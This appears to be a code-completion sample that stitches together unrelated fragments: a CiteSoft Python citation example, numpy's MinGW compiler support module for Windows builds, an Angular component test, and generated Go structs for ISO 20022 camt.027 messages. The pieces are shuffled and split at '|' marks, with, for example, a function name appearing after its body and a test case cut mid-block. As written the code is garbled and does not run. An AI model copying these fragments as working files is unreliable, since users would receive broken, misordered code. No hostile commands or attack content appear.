@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def std_dev(list_of_num):
return sqrt(sample_variance(list_of_num))
@CiteSoft.after_call_compile_consolidated_log() #This will cause the consolidated log to be complied after the mean function is called. #note that we put it after the function_call_cite so that it is a wrapper around that wrapper and occurs second.
@CiteSoft.function_call_cite(MathExample_unique_id, software_name, **kwargs)
def cite_me(): #This is just an example of how a package creating dev-user could make a function that other dev-users relying on their package could call at the very end of doing everything, so that no calls to CiteSoft would need to occur during runtime.
pass
#note that the above lines of code simply add to the file CiteSoftwareCheckPoints
#if one wants to create a consolidated log that removes duplicates, one can call a CiteSoft function
#This is considered appropriate to do at the end of a complicated program, but is not necessary.
#it would have been possible to also use decorators on any of the above functions, like @CiteSoft.after_call_compile_checkpoints_log or @CiteSoft.after_call_compile_consolidated_log. Note that chained/stacked decorators are performed in "first in last out" order, since they are wrappers on wrappers. So if a function has both @CiteSoft.function_call_cite and @after_call_compile_consolidated_log, the @CiteSoft.function_call_cite should be second.
def export_citation_checkpoints(filepath=""):
if filepath is not "":
CiteSoft.compile_checkpoints_log(filepath)
else:
CiteSoft.compile_checkpoints_log() | @CiteSoft.function_call_cite(unique_id=MathExample_unique_id, software_name="CiteSoft Math Example", **kwargs)
def subtract(num1, num2):
return num1 - num2
|
mingw32ccompiler.py | """
Support code for building Python extensions on Windows.
# NT stuff
# 1. Make sure libpython<version>.a exists for gcc. If not, build it.
# 2. Force windows to use gcc (we're struggling with MSVC and g77 support)
# 3. Force windows to use g77
"""
from __future__ import division, absolute_import, print_function
import os
import sys
import subprocess
import re
# Overwrite certain distutils.ccompiler functions:
import numpy.distutils.ccompiler
if sys.version_info[0] < 3:
from . import log
else:
from numpy.distutils import log
# NT stuff
# 1. Make sure libpython<version>.a exists for gcc. If not, build it.
# 2. Force windows to use gcc (we're struggling with MSVC and g77 support)
# --> this is done in numpy/distutils/ccompiler.py
# 3. Force windows to use g77
import distutils.cygwinccompiler
from distutils.version import StrictVersion
from numpy.distutils.ccompiler import gen_preprocess_options, gen_lib_options
from distutils.unixccompiler import UnixCCompiler
from distutils.msvccompiler import get_build_version as get_build_msvc_version
from distutils.errors import (DistutilsExecError, CompileError,
UnknownFileError)
from numpy.distutils.misc_util import (msvc_runtime_library,
get_build_architecture)
# Useful to generate table of symbols from a dll
_START = re.compile(r'\[Ordinal/Name Pointer\] Table')
_TABLE = re.compile(r'^\s+\[([\s*[0-9]*)\] ([a-zA-Z0-9_]*)')
# the same as cygwin plus some additional parameters
class Mingw32CCompiler(distutils.cygwinccompiler.CygwinCCompiler):
""" A modified MingW32 compiler compatible with an MSVC built Python.
"""
compiler_type = 'mingw32'
def __init__ (self,
verbose=0,
dry_run=0,
force=0):
distutils.cygwinccompiler.CygwinCCompiler.__init__ (self, verbose,
dry_run, force)
# we need to support 3.2 which doesn't match the standard
# get_versions methods regex
if self.gcc_version is None:
import re
p = subprocess.Popen(['gcc', '-dumpversion'], shell=True,
stdout=subprocess.PIPE)
out_string = p.stdout.read()
p.stdout.close()
result = re.search('(\d+\.\d+)', out_string)
if result:
self.gcc_version = StrictVersion(result.group(1))
# A real mingw32 doesn't need to specify a different entry point,
# but cygwin 2.91.57 in no-cygwin-mode needs it.
if self.gcc_version <= "2.91.57":
entry_point = '--entry _DllMain@12'
else:
entry_point = ''
if self.linker_dll == 'dllwrap':
# Commented out '--driver-name g++' part that fixes weird
# g++.exe: g++: No such file or directory
# error (mingw 1.0 in Enthon24 tree, gcc-3.4.5).
# If the --driver-name part is required for some environment
# then make the inclusion of this part specific to that
# environment.
self.linker = 'dllwrap' # --driver-name g++'
elif self.linker_dll == 'gcc':
self.linker = 'g++'
p = subprocess.Popen(['gcc', '--version'], shell=True,
stdout=subprocess.PIPE)
out_string = p.stdout.read()
p.stdout.close()
# Before build with MinGW-W64 generate the python import library
# with gendef and dlltool according to the MingW-W64 FAQ.
# Use the MinGW-W64 provided msvc runtime import libraries.
# Don't call build_import_library() and build_msvcr_library.
if 'MinGW-W64' not in str(out_string):
# **changes: eric jones 4/11/01
# 1. Check for import library on Windows. Build if it doesn't
# exist.
build_import_library()
# Check for custom msvc runtime library on Windows. Build if it
# doesn't exist.
msvcr_success = build_msvcr_library()
msvcr_dbg_success = build_msvcr_library(debug=True)
if msvcr_success or msvcr_dbg_success:
# add preprocessor statement for using customized msvcr lib
self.define_macro('NPY_MINGW_USE_CUSTOM_MSVCR')
# Define the MSVC version as hint for MinGW
msvcr_version = '0x%03i0' % int(msvc_runtime_library().lstrip('msvcr'))
self.define_macro('__MSVCRT_VERSION__', msvcr_version)
# MS_WIN64 should be defined when building for amd64 on windows,
# but python headers define it only for MS compilers, which has all
# kind of bad consequences, like using Py_ModuleInit4 instead of
# Py_ModuleInit4_64, etc... So we add it here
if get_build_architecture() == 'AMD64':
if self.gcc_version < "4.0":
self.set_executables(
compiler='gcc -g -DDEBUG -DMS_WIN64 -mno-cygwin -O0 -Wall',
compiler_so='gcc -g -DDEBUG -DMS_WIN64 -mno-cygwin -O0'
' -Wall -Wstrict-prototypes',
linker_exe='gcc -g -mno-cygwin',
linker_so='gcc -g -mno-cygwin -shared')
else:
# gcc-4 series releases do not support -mno-cygwin option
self.set_executables(
compiler='gcc -march=x86-64 -mtune=generic -DMS_WIN64'
' -O2 -msse2 -Wall',
compiler_so='gcc -march=x86-64 -mtune=generic -DMS_WIN64'
' -O2 -msse2 -Wall -Wstrict-prototypes',
linker_exe='gcc',
linker_so='gcc -shared -Wl,-gc-sections -Wl,-s')
else:
if self.gcc_version <= "3.0.0":
self.set_executables(
compiler='gcc -mno-cygwin -O2 -w',
compiler_so='gcc -mno-cygwin -mdll -O2 -w'
' -Wstrict-prototypes',
linker_exe='g++ -mno-cygwin',
linker_so='%s -mno-cygwin -mdll -static %s' %
(self.linker, entry_point))
elif self.gcc_version < "4.0":
self.set_executables(
compiler='gcc -mno-cygwin -O2 -Wall',
compiler_so='gcc -mno-cygwin -O2 -Wall'
' -Wstrict-prototypes',
linker_exe='g++ -mno-cygwin',
linker_so='g++ -mno-cygwin -shared')
else:
# gcc-4 series releases do not support -mno-cygwin option i686
# build needs '-mincoming-stack-boundary=2' due to ABI
# incompatibility to Win32 ABI
self.set_executables(
compiler='gcc -O2 -march=core2 -mtune=generic'
' -mfpmath=sse -msse2'
' -mincoming-stack-boundary=2 -Wall',
compiler_so='gcc -O2 -march=core2 -mtune=generic'
' -mfpmath=sse -msse2'
' -mincoming-stack-boundary=2 -Wall'
' -Wstrict-prototypes',
linker_exe='g++ ',
linker_so='g++ -shared -Wl,-gc-sections -Wl,-s')
# added for python2.3 support we can't pass it through set_executables
# because pre 2.2 would fail
self.compiler_cxx = ['g++']
# Maybe we should also append -mthreads, but then the finished dlls
# need another dll (mingwm10.dll see Mingw32 docs) (-mthreads: Support
# thread-safe exception handling on `Mingw32')
# no additional libraries needed
#self.dll_libraries=[]
return
# __init__ ()
def link(self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
export_symbols = None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
# Include the appropiate MSVC runtime library if Python was built
# with MSVC >= 7.0 (MinGW standard is msvcrt)
runtime_library = msvc_runtime_library()
if runtime_library:
if not libraries:
libraries = []
libraries.append(runtime_library)
args = (self,
target_desc,
objects,
output_filename,
output_dir,
libraries,
library_dirs,
runtime_library_dirs,
None, #export_symbols, we do this in our def-file
debug,
extra_preargs,
extra_postargs,
build_temp,
target_lang)
if self.gcc_version < "3.0.0":
func = distutils.cygwinccompiler.CygwinCCompiler.link
else:
func = UnixCCompiler.link
func(*args[:func.__code__.co_argcount])
return
def object_filenames (self,
source_filenames,
strip_dir=0,
output_dir=''):
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
# use normcase to make sure '.rc' is really '.rc' and not '.RC'
(base, ext) = os.path.splitext (os.path.normcase(src_name))
# added these lines to strip off windows drive letters
# without it, .o files are placed next to .c files
# instead of the build directory
drv, base = os.path.splitdrive(base)
if drv:
base = base[1:]
if ext not in (self.src_extensions + ['.rc', '.res']):
raise UnknownFileError(
"unknown file type '%s' (from '%s')" % \
(ext, src_name))
if strip_dir:
base = os.path.basename (base)
if ext == '.res' or ext == '.rc':
# these need to be compiled to object files
obj_names.append (os.path.join (output_dir,
base + ext + self.obj_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
# object_filenames ()
def find_python_dll():
maj, min, micro = [int(i) for i in sys.version_info[:3]]
dllname = 'python%d%d.dll' % (maj, min)
print("Looking for %s" % dllname)
# We can't do much here:
# - find it in python main dir
# - in system32,
# - ortherwise (Sxs), I don't know how to get it.
lib_dirs = []
lib_dirs.append(sys.prefix)
lib_dirs.append(os.path.join(sys.prefix, 'lib'))
try:
lib_dirs.append(os.path.join(os.environ['SYSTEMROOT'], 'system32'))
except KeyError:
pass
for d in lib_dirs:
dll = os.path.join(d, dllname)
if os.path.exists(dll):
return dll
raise ValueError("%s not found in %s" % (dllname, lib_dirs))
def dump_table(dll):
st = subprocess.Popen(["objdump.exe", "-p", dll], stdout=subprocess.PIPE)
return st.stdout.readlines()
def generate_def(dll, dfile):
"""Given a dll file location, get all its exported symbols and dump them
into the given def file.
The .def file will be overwritten"""
dump = dump_table(dll)
for i in range(len(dump)):
if _START.match(dump[i].decode()):
break
else:
raise ValueError("Symbol table not found")
syms = []
for j in range(i+1, len(dump)):
m = _TABLE.match(dump[j].decode())
if m:
syms.append((int(m.group(1).strip()), m.group(2)))
else:
break
if len(syms) == 0:
log.warn('No symbols found in %s' % dll)
d = open(dfile, 'w')
d.write('LIBRARY %s\n' % os.path.basename(dll))
d.write(';CODE PRELOAD MOVEABLE DISCARDABLE\n')
d.write(';DATA PRELOAD SINGLE\n')
d.write('\nEXPORTS\n')
for s in syms:
#d.write('@%d %s\n' % (s[0], s[1]))
d.write('%s\n' % s[1])
d.close()
def find_dll(dll_name):
arch = {'AMD64' : 'amd64',
'Intel' : 'x86'}[get_build_architecture()]
def _find_dll_in_winsxs(dll_name):
# Walk through the WinSxS directory to find the dll.
winsxs_path = os.path.join(os.environ['WINDIR'], 'winsxs')
if not os.path.exists(winsxs_path):
return None
for root, dirs, files in os.walk(winsxs_path):
if dll_name in files and arch in root:
return os.path.join(root, dll_name)
return None
def _find_dll_in_path(dll_name):
# First, look in the Python directory, then scan PATH for
# the given dll name.
for path in [sys.prefix] + os.environ['PATH'].split(';'):
filepath = os.path.join(path, dll_name)
if os.path.exists(filepath):
return os.path.abspath(filepath)
return _find_dll_in_winsxs(dll_name) or _find_dll_in_path(dll_name)
def build_msvcr_library(debug=False):
if os.name != 'nt':
return False
msvcr_name = msvc_runtime_library()
# Skip using a custom library for versions < MSVC 8.0
if int(msvcr_name.lstrip('msvcr')) < 80:
log.debug('Skip building msvcr library:'
' custom functionality not present')
return False
if debug:
msvcr_name += 'd'
# Skip if custom library already exists
out_name = "lib%s.a" % msvcr_name
out_file = os.path.join(sys.prefix, 'libs', out_name)
if os.path.isfile(out_file):
log.debug('Skip building msvcr library: "%s" exists' %
(out_file,))
return True
# Find the msvcr dll
msvcr_dll_name = msvcr_name + '.dll'
dll_file = find_dll(msvcr_dll_name)
if not dll_file:
log.warn('Cannot build msvcr library: "%s" not found' %
msvcr_dll_name)
return False
def_name = "lib%s.def" % msvcr_name
def_file = os.path.join(sys.prefix, 'libs', def_name)
log.info('Building msvcr library: "%s" (from %s)' \
% (out_file, dll_file))
# Generate a symbol definition file from the msvcr dll
generate_def(dll_file, def_file)
# Create a custom mingw library for the given symbol definitions
cmd = ['dlltool', '-d', def_file, '-l', out_file]
retcode = subprocess.call(cmd)
# Clean up symbol definitions
os.remove(def_file)
return (not retcode)
def build_import_library():
if os.name != 'nt':
return
arch = get_build_architecture()
if arch == 'AMD64':
return _build_import_library_amd64()
elif arch == 'Intel':
return _build_import_library_x86()
else:
raise ValueError("Unhandled arch %s" % arch)
def _build_import_library_amd64():
dll_file = find_python_dll()
out_name = "libpython%d%d.a" % tuple(sys.version_info[:2])
out_file = os.path.join(sys.prefix, 'libs', out_name)
if os.path.isfile(out_file):
log.debug('Skip building import library: "%s" exists' %
(out_file))
return
def_name = "python%d%d.def" % tuple(sys.version_info[:2])
def_file = os.path.join(sys.prefix, 'libs', def_name)
log.info('Building import library (arch=AMD64): "%s" (from %s)' %
(out_file, dll_file))
generate_def(dll_file, def_file)
cmd = ['dlltool', '-d', def_file, '-l', out_file]
subprocess.Popen(cmd)
def _build_import_library_x86():
""" Build the import libraries for Mingw32-gcc on Windows
"""
lib_name = "python%d%d.lib" % tuple(sys.version_info[:2])
lib_file = os.path.join(sys.prefix, 'libs', lib_name)
out_name = "libpython%d%d.a" % tuple(sys.version_info[:2])
out_file = os.path.join(sys.prefix, 'libs', out_name)
if not os.path.isfile(lib_file):
log.warn('Cannot build import library: "%s" not found' % (lib_file))
return
if os.path.isfile(out_file):
log.debug('Skip building import library: "%s" exists' % (out_file))
return
log.info('Building import library (ARCH=x86): "%s"' % (out_file))
from numpy.distutils import lib2def
def_name = "python%d%d.def" % tuple(sys.version_info[:2])
def_file = os.path.join(sys.prefix, 'libs', def_name)
nm_cmd = '%s %s' % (lib2def.DEFAULT_NM, lib_file)
nm_output = lib2def.getnm(nm_cmd)
dlist, flist = lib2def.parse_nm(nm_output)
lib2def.output_def(dlist, flist, lib2def.DEF_HEADER, open(def_file, 'w'))
dll_name = "python%d%d.dll" % tuple(sys.version_info[:2])
args = (dll_name, def_file, out_file)
cmd = 'dlltool --dllname %s --def %s --output-lib %s' % args
status = os.system(cmd)
# for now, fail silently
if status:
log.warn('Failed to build import library for gcc. Linking will fail.')
return
#=====================================
# Dealing with Visual Studio MANIFESTS
#=====================================
# Functions to deal with visual studio manifests. Manifest are a mechanism to
# enforce strong DLL versioning on windows, and has nothing to do with
# distutils MANIFEST. manifests are XML files with version info, and used by
# the OS loader; they are necessary when linking against a DLL not in the
# system path; in particular, official python 2.6 binary is built against the
# MS runtime 9 (the one from VS 2008), which is not available on most windows
# systems; python 2.6 installer does install it in the Win SxS (Side by side)
# directory, but this requires the manifest for this to work. This is a big
# mess, thanks MS for a wonderful system.
# XXX: ideally, we should use exactly the same version as used by python. I
# submitted a patch to get this version, but it was only included for python
# 2.6.1 and above. So for versions below, we use a "best guess".
_MSVCRVER_TO_FULLVER = {}
if sys.platform == 'win32':
try:
import msvcrt
# I took one version in my SxS directory: no idea if it is the good
# one, and we can't retrieve it from python
_MSVCRVER_TO_FULLVER['80'] = "8.0.50727.42"
_MSVCRVER_TO_FULLVER['90'] = "9.0.21022.8"
# Value from msvcrt.CRT_ASSEMBLY_VERSION under Python 3.3.0
# on Windows XP:
_MSVCRVER_TO_FULLVER['100'] = "10.0.30319.460"
if hasattr(msvcrt, "CRT_ASSEMBLY_VERSION"):
major, minor, rest = msvcrt.CRT_ASSEMBLY_VERSION.split(".", 2)
_MSVCRVER_TO_FULLVER[major + minor] = msvcrt.CRT_ASSEMBLY_VERSION
del major, minor, rest
except ImportError:
# If we are here, means python was not built with MSVC. Not sure what
# to do in that case: manifest building will fail, but it should not be
# used in that case anyway
log.warn('Cannot import msvcrt: using manifest will not be possible')
def msvc_manifest_xml(maj, min):
"""Given a major and minor version of the MSVCR, returns the
corresponding XML file."""
try:
fullver = _MSVCRVER_TO_FULLVER[str(maj * 10 + min)]
except KeyError:
raise ValueError("Version %d,%d of MSVCRT not supported yet" %
(maj, min))
# Don't be fooled, it looks like an XML, but it is not. In particular, it
# should not have any space before starting, and its size should be
# divisible by 4, most likely for alignement constraints when the xml is
# embedded in the binary...
# This template was copied directly from the python 2.6 binary (using
# strings.exe from mingw on python.exe).
template = """\
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC%(maj)d%(min)d.CRT" version="%(fullver)s" processorArchitecture="*" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>"""
return template % {'fullver': fullver, 'maj': maj, 'min': min}
def manifest_rc(name, type='dll'):
"""Return the rc file used to generate the res file which will be embedded
as manifest for given manifest file name, of given type ('dll' or
'exe').
Parameters
----------
name : str
name of the manifest file to embed
type : str {'dll', 'exe'}
type of the binary which will embed the manifest
"""
if type == 'dll':
rctype = 2
elif type == 'exe':
rctype = 1
else:
raise ValueError("Type %s not supported" % type)
return """\
#include "winuser.h"
%d RT_MANIFEST %s""" % (rctype, name)
def | (msver):
"""msver is the ms runtime version used for the MANIFEST."""
# check msvcr major version are the same for linking and
# embedding
msvcv = msvc_runtime_library()
if msvcv:
assert msvcv.startswith("msvcr"), msvcv
# Dealing with something like "mscvr90" or "mscvr100", the last
# last digit is the minor release, want int("9") or int("10"):
maj = int(msvcv[5:-1])
if not maj == int(msver):
raise ValueError(
"Discrepancy between linked msvcr " \
"(%d) and the one about to be embedded " \
"(%d)" % (int(msver), maj))
def configtest_name(config):
base = os.path.basename(config._gen_temp_sourcefile("yo", [], "c"))
return os.path.splitext(base)[0]
def manifest_name(config):
# Get configest name (including suffix)
root = configtest_name(config)
exext = config.compiler.exe_extension
return root + exext + ".manifest"
def rc_name(config):
# Get configtest name (including suffix)
root = configtest_name(config)
return root + ".rc"
def generate_manifest(config):
msver = get_build_msvc_version()
if msver is not None:
if msver >= 8:
check_embedded_msvcr_match_linked(msver)
ma = int(msver)
mi = int((msver - ma) * 10)
# Write the manifest file
manxml = msvc_manifest_xml(ma, mi)
man = open(manifest_name(config), "w")
config.temp_files.append(manifest_name(config))
man.write(manxml)
man.close()
| check_embedded_msvcr_match_linked |
app.component.spec.ts | import {TestBed, waitForAsync} from '@angular/core/testing';
import { AppComponent } from './app.component';
describe('AppComponent', () => {
beforeEach(waitForAsync(() => {
TestBed.configureTestingModule({
declarations: [
AppComponent
],
}).compileComponents();
}));
it('should create the app', () => {
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.debugElement.componentInstance;
expect(app).toBeTruthy();
}); | expect(app.title).toEqual('logigator-editor');
});
it('should render title', () => {
const fixture = TestBed.createComponent(AppComponent);
fixture.detectChanges();
const compiled = fixture.debugElement.nativeElement;
expect(compiled.querySelector('.content span').textContent).toContain('logigator-editor app is running!');
});
}); |
it(`should have as title 'logigator-editor'`, () => {
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.debugElement.componentInstance; |
camt.027.001.09.xsd.go | // Code generated by download. DO NOT EDIT.
package iso20022_camt_027_001_09
import (
"bytes"
"encoding/base64"
"encoding/xml"
"time"
)
type AccountIdentification4Choice struct {
IBAN IBAN2007Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IBAN,omitempty"`
Othr GenericAccountIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
}
type AccountSchemeName1Choice struct {
Cd ExternalAccountIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ActiveOrHistoricCurrencyAndAmount struct {
Value float64 `xml:",chardata"`
Ccy ActiveOrHistoricCurrencyCode `xml:"Ccy,attr"`
}
// Must match the pattern [A-Z]{3,3}
type ActiveOrHistoricCurrencyCode string
// May be one of ADDR, PBOX, HOME, BIZZ, MLTO, DLVY
type AddressType2Code string
type AddressType3Choice struct {
Cd AddressType2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry GenericIdentification30 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type AmendmentInformationDetails14 struct {
OrgnlMndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMndtId,omitempty"`
OrgnlCdtrSchmeId PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrSchmeId,omitempty"`
OrgnlCdtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrAgt,omitempty"`
OrgnlCdtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCdtrAgtAcct,omitempty"`
OrgnlDbtr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtr,omitempty"`
OrgnlDbtrAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAcct,omitempty"`
OrgnlDbtrAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAgt,omitempty"`
OrgnlDbtrAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlDbtrAgtAcct,omitempty"`
OrgnlFnlColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlFnlColltnDt,omitempty"`
OrgnlFrqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlFrqcy,omitempty"`
OrgnlRsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlRsn,omitempty"`
OrgnlTrckgDays Exact2NumericText `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTrckgDays,omitempty"`
}
type AmountType4Choice struct {
InstdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdAmt,omitempty"`
EqvtAmt EquivalentAmount2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EqvtAmt,omitempty"`
}
// Must match the pattern [A-Z0-9]{4,4}[A-Z]{2,2}[A-Z0-9]{2,2}([A-Z0-9]{3,3}){0,1}
type AnyBICDec2014Identifier string
// Must match the pattern [A-Z0-9]{4,4}[A-Z]{2,2}[A-Z0-9]{2,2}([A-Z0-9]{3,3}){0,1}
type BICFIDec2014Identifier string
type BranchAndFinancialInstitutionIdentification6 struct {
FinInstnId FinancialInstitutionIdentification18 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FinInstnId"`
BrnchId BranchData3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 BrnchId,omitempty"`
}
type BranchData3 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
LEI LEIIdentifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 LEI,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PstlAdr PostalAddress24 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PstlAdr,omitempty"`
}
type Case5 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Cretr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cretr"`
ReopCaseIndctn bool `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReopCaseIndctn,omitempty"`
}
type CaseAssignment5 struct {
Id Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id"`
Assgnr Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgnr"`
Assgne Party40Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgne"`
CreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CreDtTm"`
}
type CashAccount40 struct {
Id AccountIdentification4Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Id,omitempty"`
Tp CashAccountType2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ccy ActiveOrHistoricCurrencyCode `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ccy,omitempty"`
Nm Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
Prxy ProxyAccountIdentification1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prxy,omitempty"`
}
type CashAccountType2Choice struct {
Cd ExternalCashAccountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type CategoryPurpose1Choice struct {
Cd ExternalCategoryPurpose1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClaimNonReceiptV09 struct {
Assgnmt CaseAssignment5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Assgnmt"`
Case Case5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Case,omitempty"`
Undrlyg UnderlyingTransaction7Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Undrlyg"`
CoverDtls MissingCover5 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CoverDtls,omitempty"`
InstrForAssgne InstructionForAssignee1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstrForAssgne,omitempty"`
SplmtryData []SupplementaryData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SplmtryData,omitempty"`
}
// May be one of RTGS, RTNS, MPNS, BOOK
type ClearingChannel2Code string
type ClearingSystemIdentification2Choice struct {
Cd ExternalClearingSystemIdentification1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClearingSystemIdentification3Choice struct {
Cd ExternalCashClearingSystem1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type ClearingSystemMemberIdentification2 struct {
ClrSysId ClearingSystemIdentification2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSysId,omitempty"`
MmbId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MmbId"`
}
type Contact4 struct {
NmPrfx NamePrefix2Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 NmPrfx,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
PhneNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PhneNb,omitempty"`
MobNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MobNb,omitempty"`
FaxNb PhoneNumber `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FaxNb,omitempty"`
EmailAdr Max2048Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EmailAdr,omitempty"`
EmailPurp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 EmailPurp,omitempty"`
JobTitl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 JobTitl,omitempty"`
Rspnsblty Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rspnsblty,omitempty"`
Dept Max70Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dept,omitempty"`
Othr []OtherContact1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Othr,omitempty"`
PrefrdMtd PreferredContactMethod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PrefrdMtd,omitempty"`
}
// Must match the pattern [A-Z]{2,2}
type CountryCode string
// May be one of CRDT, DBIT
type CreditDebitCode string
type CreditTransferMandateData1 struct {
MndtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 MndtId,omitempty"`
Tp MandateTypeInformation2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
DtOfSgntr ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfSgntr,omitempty"`
DtOfVrfctn ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DtOfVrfctn,omitempty"`
ElctrncSgntr Max10KBinary `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ElctrncSgntr,omitempty"`
FrstPmtDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrstPmtDt,omitempty"`
FnlPmtDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FnlPmtDt,omitempty"`
Frqcy Frequency36Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Frqcy,omitempty"`
Rsn MandateSetupReason1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rsn,omitempty"`
}
type CreditorReferenceInformation2 struct {
